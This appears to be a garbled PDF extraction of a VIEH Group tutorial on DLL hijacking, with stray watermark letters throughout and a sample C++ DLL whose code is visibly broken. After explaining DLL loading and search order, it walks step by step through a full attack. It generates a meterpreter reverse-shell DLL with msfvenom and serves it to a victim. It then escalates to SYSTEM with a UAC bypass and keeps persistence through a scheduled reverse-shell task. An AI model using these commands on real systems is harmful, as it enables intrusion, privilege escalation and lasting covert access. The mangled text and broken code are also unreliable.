DLL Hijacking Basics
DLL Hijacking Basics
HIJACKING BASICS
p
professional advice. While we have made every
u
effort to ensure the accuracy and reliability of
o
the information presented, VIEH Group
r
disclaims any warranties or representations,
g
express or implied, regarding the
completeness, accuracy, or usefulness of this
h
document. Any reliance you place on the
e
information contained in this document is
i
strictly at your own risk. VIEH Group shall not
v
be liable for any damages arising from the use
of or reliance on this document. also, we highly
@
appreciate the source person for this
document.
Happy reading!
p
malicious actor takes advantage of a
u
system’s search order for dynamic link
o
libraries (DLL) to load and execute malicious
r
code instead of legitimate libraries. In other
g
words, it refers to tricking a program to load
h
a harmful code library instead of the
intended safe one. Before going into details,
ie
let’s take a look at DLL Files.
v
What is a DLL file?
@
DLL (stands for dynamic link library) is a file
containing reusable code and data which
multiple programs can use at the same time
to perform different functions, improving
efficiency and modularity in software
development.
up
Similar to those smaller boxes with labeling
o
are DLLs. It is a set of resources that various
r
software applications may use. When a
g
software requires a tool, it searches for it in
h
the appropriate named box (DLL). As you
e
would choose the appropriate LEGO set to
i
discover the appropriate tool for the job. One
v
DLL file can be used by different programs at
the same time.
@
Dynamic-link library is Microsoft’s
implementation of the shared library concept
in the Microsoft Windows, so if you want to
know more about this concept, you can
search for “shared libraries”.
p
connecting to the internet etc.) These
u
functions are similar to the tools we
discussed earlier.
ro
// MathLibrary.cpp: Defines the exported functions for the DLL.
#include "pch.h" // use stdafx.h in Visual Studio 2017 and earlier
g
#include <utility> Copy
#include <limits.h>
#include "MathLibrary.h"
h
// DLL internal state variables:
static unsigned long long previous_; // Previous value, if any
e
static unsigned long long current_; // Current sequence value
// Current seq. position
static unsigned index_;
i
// Initialize a Fibonacci relation sequence
// such that F(0) = a, F (1) = b.
// This function must be called before any other function.
void fibonacci_init(
v
const unsigned long long a,
const unsigned long long b)
{
index_ = 0;
current_ = a;
previous_ = B; // see special case when initialized
}
@
// Produce the next value in the sequence.
// Returns true on success, false on overflow.
bool fibonacci_next()
{
// check to see if we'd overflow result or position
if ((ULLONG_MAX - previous_ < current_) ||
{ (UINT_MAX == index_))
return false;
}
// Special case when index == 0, just return b value
if (index_ > 0)
{
// otherwise, calculate next sequence value
previous += current_;
}
std::swap(current_, previous_);
++index_;
return true;
}
// Get the current value in the sequence.
unsigned long long fibonacci_current()
return current_;
}
// Get the current index position in the sequence.
unsigned fibonacci_index()
{
return index_;
}
Social Media: viehgroup www.viehgroup.com [email protected]
The above code demonstrates an
implementation of a dynamic link library that
defines functions for generating a Fibonacci
sequence that can be used by other programs
to generate Fibonacci sequences.
up
At this point we know what a DLL is and why it
o
is used. Below let’s see how a DLL works after
r
you click a program that requires it step by
g
Copy
step.
h
Loading dll into memory
e
After you click on a executable (.exe), the
i
operating system (OS) loads the program into
v
memory and starts its execution. If the
program requires a DLL, the operating system
@
will first need to load the DLL into memory.
This is done by searching for the DLL in a few
different locations, such as the system
directory, the program directory, and the
current directory. Once the DLL is found, it is
loaded into memory and made available to
the program.
up
o
The linker resolves all the references to
r
functions and variables in the DLL at
g
Copy
compile time.
h
This means that the program can call
e
functions in the DLL directly, without
i
having to load the DLL into memory at
v
runtime.
This makes executable file bigger, but
@
makes the program faster.
Runtime linking
The linker does not resolve all the
references to functions and variables in
the DLL at compile time.
p
DLL by calling the GetProcAddress
u
function to get the address of the
function in the DLL.
ro
This makes the program’s executable file
g
smaller, but it also makes the program
Copy
slower.
eh
i
DLL Search Order
v
When you start an .exe file file that requires a
DLL, The DLL loader (is a part of the operating
@
system) starts searching for that specific DLL
on the system. The files are searched
according to certain rules, known as DLL
Search Order.
p
“C:\Windows\System32")
u
3. The Windows Directory (“C:\Windows.”)
o
4. The current directory.
r
5. Directories Listed in the system PATH
g
Environment Variable
Copy
eh
i
7. The directories that are listed in the PATH
v
environment variable.
@
This concept is critical in DLL hijacking.
During this process, we can inject our own
malicious DLLs into locations where DLL
Loader searches for the innocent DLL. We will
come to this in later chapters.
p
What is the idea of DLL hijacking?
Most of the time the main idea is to exploit
u
the search order that programs use to find
o
and load DLLs. An attacker can mislead a
r
software into loading harmful code instead of
g
Copy
h
malicious DLL in a spot where the program
e
looks for DLLs. This way an attacker can
i
escalate privileges and gain persistence on
v
the system. This is why I emphasized search
order in the previous chapter.
@
Altough i mentioned only search order
manipulation, there are several options, and
the effectiveness of each depends on how the
program is set up to load the necessary DLLs.
Potential strategies include:
p
intended legitimate DLL.
u
DLL replacement: In DLL replacement
o
the attacker tries to swap out a
r
legitimate DLL with a malicious one. It
g
Copy
h
DLL Search Order Hijacking: In a search
e
order hijacking attack, an attacker
vi
manipulates the order in which a
program looks for dynamic link libraries
@
(DLLs), allowing them to store a
malicious DLL at a location that the
program searches first, resulting in the
malicious DLL being loaded instead of
the genuine one.
p
directly side-load their payloads by
u
putting a legitimate application in the
o
search order of a program, then calling it
r
to execute their payload(s), as opposed
g
Copy
h
the victim application to be executed.
ie
Finding Missing DLL Files
v
Missing DLL files are a great opportunity
@
for attackers to take advantage of their
absence. If a DLL is missing from the
system, they can try to place an imitation
of the original DLL to use for otheir own
purposes, including escalating privileges.
p
3. Click on “pocmon.exe”.
u
4. After that you will see various
o
processes going on. Click the blue
r
filter button in the top left.
g
Copy
h
one is “Result is NAME NOT FOUND
e
Include” and the second one is
i
“PATH ends with .dll Include”
v
@
Now you can see a list of missing DLL’s in
various processes. These load failures
can be exploited by attackers in DLL
Hijacking.
p
have already discussed above.
u
Exploiting Missing DLL Files
o
r
Lets imagine a scenerio that you found a
g
Copy
h
attempts to load CFF ExplorerENU.dll
e
from the location the program is
i
installed to.
v
@
Social Media: viehgroup www.viehgroup.com [email protected]
If you look at figure 4, you can see that
the process is trying to load a DLL from
the path “C:\Program
Files\NTCore\Explorer Suite”, which
resulting in “NAME NOT FOUND” failure.
In this example we will try to exploit this
p
missing DLL using msfvenom in Kali
u
Linux.
o
Step 1 - Create payload using msfvenom
r
To exploit missing DLL files in the target
g
Copy
h
payload using msfvenom tool (optionally
e
in kali).
vi
Msfvenom is the combination of payload
generation and encoding. It replaced
@
msfpayload and msfencode on June 8th
2015. — From metasploit.com
To create a payload, we will use the
following command:
msfvenom -p windows/meterpreter/reverse_tcp -
ax86 -f dll LHOST=192.168.1.115 LPORT=4444 >
CFF_ExplorerENU.dll
Social Media: viehgroup www.viehgroup.com [email protected]
After that you should be seeing the
payload in your computer.
up
ro
g
Copy
eh
vi
@
We will use this DLL to trick the Windows
host into loading the payload instead of
the missing one.
p
using a virtual machine as a victim you
u
can simply drag & drop, but if you want
o
to do something closer to real life
r
scenarios you can try setting up a http
g
Copy
h
machine assuming as if there is some
e
kind of phishing attack going on.
vi
In my example, I will host a simple http
server on kali and then assume that the
@
victim has been tricked into downloading
the malicious DLL instead of the missing
DLL.
Here is how can you host a server using
python3:
python3 -m http.server --bind
192.168.1.115
Social Media: viehgroup www.viehgroup.com [email protected]
Now after the server goes live, victim
p
Windows7 machine has downloaded and
u
replaced the missing DLL with this evil
o
DLL file in our scenerio.
gr
Copy
eh
vi
@
Social Media: viehgroup www.viehgroup.com [email protected]
Step 3— Get shell using metasploit
Now after we delivered the payload
successfully, we need to start up
metasploit and set it up to recieve
sessions from payload. Let’s do it step by
p
step.
u
Start metasploit using the command
o
below:
r
$sudo msfconsole
g
Copy
eh
vi
@
Social Media: viehgroup www.viehgroup.com [email protected]
We are going to use multi/handler to
get a meterpreter shell.
use multi/handler
After typing the command above you
should be seeing this:
up
ro
g
Now we need to sey up LHOST and
Copy
h
LPORT.
e
The LHOST is the IP address of the
i
attacking computer and the LPORT is
v
the port to listen on for a connection
from the target computer. The “L” in
@
both attribute names stands for “local”.
To set LHOST you need to use your
machine’s local IP address. You can learn
it by typing ip a in terminal.
Setting LHOST:
set LHOST <YOUR LOCAL IP ADDRESS>
Social Media: viehgroup www.viehgroup.com [email protected]
Settining LPORT: (4444 by default)
set LPORT 4444
After setting lhost and lport, we will
set our payload as:
set PAYLOAD
windows/meterpreter/reverse_tcp
p
Finally type show options to see if all
u
options are set correctly.
o
show options
r
After you should be seeing an output like
g
Copy
this:
eh
vi
@
Social Media: viehgroup www.viehgroup.com [email protected]
Not we can run our exploit and start
listening the victim machine to see if
payload is activated or not. Type
below:
exploit
Now reverse tcp handler should be
p
started on your specified LHOST address
u
as follows:
ro
hg
At this point everything is set and all that
ie
needs to be done to give a shell to the
v
attacker machine is to run the .exe file it
is connected to and load the dll file into
@
memory.
At this point victim machine starts CFF
Explorerprogram and allow the malicious DLL to
run. As soon as the DLL file is run, it should
appear in the exploit process in metasploit.
Let’s check our metasploit terminal after victim
machine has executed the vulnerable program.
p
We have successfully executed our
u
payload and had an access to the system
o
using meterpreter. Now let’s see what
r
can be done next.
g
We can simply start with typing sysinfo
h
to see basic information about the target
e
system and make sure we are on the right
i
track.
v
@
Type ps to see the list of active
processes in victim machine. Look for
admin privileged processes to migrate.
Social Media: viehgroup www.viehgroup.com [email protected]
Using the migrate post module, you can
migrate to another process on the
victim.
p
we want to use. For example I will try to
u
migrato to taskhost.exe with a PID of
o
1620.
r
migrate 1620
hg
Why we migrate?: If a target system user
ie
thinks the process is strange, he can kill
v
it, kicking us out of the system.
Therefore, using the migrate command
@
to switch to safer processes like
explorer.exe or svchost.exe, which do not
draw attention to themselves, is a good
idea.
After migrating you can use
getpidcommand to see current process
that you are working on.
Social Media: viehgroup www.viehgroup.com [email protected]
getuid command will show the real user
ID of the calling process. This way we can
tell whether we have escalated privilages
or not.
up
After entering the command we learn
o
that our current username is
r
WIN7/admin. Altough it’s an admin
g
account, we want higher privileges.
h
NT AUTHORITY\SYSTEM:It is the most
e
powerful account on a Windows local
vi
instance. In our case it’s more powerful
than WIN7/admin.
@
Use GetSystem
The GetSystem commands use a variety of
privilege escalation techniques to give
attackers access to the SYSTEM account of
a victim. If it hasn’t already been loaded,
we must first load the ‘priv’ extension
before using the getsystem command.
Social Media: viehgroup www.viehgroup.com [email protected]
use privs
getsystem
This command may not always work
properly, and can fail. In this we need to
use other payloads exist in metasploit.
up
ro
If getsystem does not work, here is a
g
method to gain elevated privilages using
h
metasploit framework:
e
Type background to send the current
vi
Meterpreter session to
background and return to the ‘msf’
the
@
prompt
background
enter “search local exploit
suggester”. This is a post-exploitation
module that you can use to check a
system for local vulnerabilities.
search local exploit suggester
Social Media: viehgroup www.viehgroup.com [email protected]
We will use this module:
use 0
Now let’s look at to options using
show options
up
following command:
ro
hg
e
As you can see, we need to set a
vi
SESSION. Check your active sessions
by typing:
@
sessions
After that you should be seeing active
session. We are going to use the session
we have created using our DLL payload.
Set the SESSION:
set session 1
up
ro
hg
ie
v
to
@
There are several vulnerabilities
detected on the target system. I’m going
try
“exploit/windows/local/bypassuac_eve
ntvwr”.
use
exploit/windows/local/bypassuac_eventvwr
Social Media: viehgroup www.viehgroup.com [email protected]
Now enter show options again to see
what should we set up before running
the exploit.
up
ro
hg
We need to set session again. Set the
ie
session again and then run the exploit:
v
set session 1
run
@
Success! A new session is opened as you
can see above. Now type getsystem again
to see if it works now:
Social Media: viehgroup www.viehgroup.com [email protected]
This time it worked. Use getuid again to see
current username:
getuid
up
Now it returns NT AUTHORITY\SYSTEM
instead of WIN7/admin. This means WE HAVE
o
ESCALATED PRIVILEGES.
r
After this point you can almost do whatever
g
you want with the system. Attack was
h
successful, we have system privileges and it’s
e
up to you to decide what to do after.
i
Lastly let’s discuss what can be done to make
v
our access to the system longer.
Step 5— Ensuring Persistence using
@
scheduled tasks
Remember that we need target program to
load DLL file to get our meterpreter shell. If
the user does not execute the program later,
our access will be interrupted. Since we have
system privileges now, it’s a good idea to find
a way to remain persistent in the system.
Social Media: viehgroup www.viehgroup.com [email protected]
There are many persistence techniques a
hacker can use to become an advanced
persistent threat to your network. Any access,
action, or configuration changes that let them
maintain their foothold on systems (e.g.:
replacing or hijacking legitimate code, adding
startup code, implanting a malware stub, etc.)
p
can allow a hacker to achieve persistence.
u
Various methods can be implemented to
o
remain persisten on the network, including
r
using schtasks to schedule a task to execute
g
vulnerable executable file and then somehow
h
hide it from the user. Instead, I will create a
new payload and insert it to target machine
ie
using the system privileges i have gained
v
previously. Here are the steps:
Open msfvenom in a new terminal again
@
using msfvenom command.
Create a new payload. We will insert this
.exe payload to the victim later on.
msfvenom -p
windows/meterpreter/reverse_tcp -f exe
LHOST=<YOUR_LOCAL_IP> LPORT=4444
>subtasks.exe
p
command.
u
upload /path/to/YourProgram.exe
o
/path/on/target/YourProgram.exe
gr
I will install the subsystem.exe file to
h
C:\Windows. You can specify the location as
you wish.
ie
v
Note: You can verify the upload using:
@
meterpreter > shell
C:\> dir /s /b
"C:\path\on\target\YourProgram.exe"
After that Our exe file must be installed on the
target machine.
using schtasks
p
A scheduled task is a way to automate the
u
execution of a program or script at specified
o
intervals. In the context of maintaining
r
persistence, you can use a scheduled task to
g
run a script or connect back to a control
h
system periodically, ensuring that you can
regain access to the target system even if it’s
ie
restarted. This is done by using schtasks in
v
Windows. We will run our uploaded payload
daily this way. Here is how can you do it step
@
by step:
Open the session we have created and type
the following command:
shell
This way we opened a standard terminal on the
target host, in our case that’s cmd.
p
according to the location of the payload you
u
downloaded.
o
This command above schedules a daily task on
r
the target system that executes a specified
g
program you specified every day at 8:00 PM.
h
This approach could be used as a way to gain
persistence on the target system, ensuring
ie
that the specified program runs automatically
v
at the specified time.
@
Social Media: viehgroup www.viehgroup.com [email protected]